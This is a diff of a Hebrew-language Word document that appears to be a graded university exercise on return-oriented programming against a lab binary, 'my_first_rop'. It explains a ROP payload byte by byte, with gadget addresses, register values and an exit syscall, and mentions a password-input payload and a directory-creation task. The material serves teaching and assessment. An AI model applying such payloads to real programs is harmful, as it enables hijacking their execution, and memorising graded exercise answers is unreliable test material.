+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x48\x00\x00\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יכילו את הערך שנרצה שיהיה ב</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> לאחר שעשינו </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %rdi”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">8 הבתים הבאים </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x71\x0e\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> הם הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %rax”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מהסעיף הקודם.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">8 הבתים הבאים </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x3c\x00\x00\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יכילו את הערך שנרצה שיהיה ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שהוא </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>60=0x3c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> על מנת שכשנגיע ל-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>syscall</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נבצע </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> עם ערך היציאה שב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">8 הבתים האחרונים </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:rtl/>
@@ -7939,28 +8503,17 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>ש</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">אחריו </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>0x90</w:t>
+        <w:t xml:space="preserve">הם הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>syscall</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7971,28 +8524,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> כתבו </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>“a\x80\x90”</w:t>
+        <w:t xml:space="preserve"> מהסעיף </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8003,84 +8535,205 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>הקודם.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">מפני שבעת ביצוע </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>syscall</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> הערך של </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> הוא 60 והערך של </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> הוא </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>0x48</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> אז נבצע יציאה מהתוכנית עם ערך היציאה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>0x48=72</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> אין חשיבות לפלט ש</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>יוד</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>פס לגבי נכונות הסיסמא.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (15 נקודות)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:bidi/>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:noProof/>
           <w:rtl/>
           <w:lang w:val="he-IL"/>
         </w:rPr>
-        <w:pict w14:anchorId="45C65C95">
-          <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-            <v:stroke joinstyle="miter"/>
-            <v:path gradientshapeok="t" o:connecttype="rect"/>
-          </v:shapetype>
-          <v:shape id="Text Box 2" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.85pt;margin-top:5.75pt;width:416.75pt;height:201.95pt;z-index:251658240;visibility:visible;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
-            <v:textbox style="mso-next-textbox:#Text Box 2">
-              <w:txbxContent>
-                <w:p/>
-              </w:txbxContent>
-            </v:textbox>
-            <w10:wrap type="square"/>
-          </v:shape>
-        </w:pict>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20B797CD" wp14:editId="6364E9BE">
+            <wp:extent cx="5731510" cy="2199640"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2" name="Picture 2"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2199640"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -8114,146 +8767,6 @@
         </w:pBdr>
         <w:bidi/>
         <w:rPr>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:rtl/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:bidi/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:rtl/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:bidi/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:rtl/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:bidi/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:rtl/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:bidi/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:rtl/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:bidi/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:rtl/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:bidi/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-          <w:rtl/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:bidi/>
-        <w:rPr>
           <w:color w:val="000000"/>
         </w:rPr>
       </w:pPr>
@@ -8332,7 +8845,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8343,7 +8855,6 @@
         </w:rPr>
         <w:t>my_first_rop</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8396,31 +8907,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>אוקטלי</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
+        <w:t xml:space="preserve"> (אוקטלי) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8444,7 +8931,6 @@
         </w:rPr>
         <w:t>בות לדרך היציאה מהתוכנית ואין חשיבות לפלט שמודפס לגבי נכונות הסיסמה. בפרט, זה בסדר שהתוכנית תסתיים כתוצאה מ</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8455,7 +8941,6 @@
         </w:rPr>
         <w:t>segfault</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8519,6 +9004,10 @@
           <w:lang w:val="he-IL"/>
         </w:rPr>
         <w:pict w14:anchorId="45C65C95">
+          <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+            <v:stroke joinstyle="miter"/>
+            <v:path gradientshapeok="t" o:connecttype="rect"/>
+          </v:shapetype>
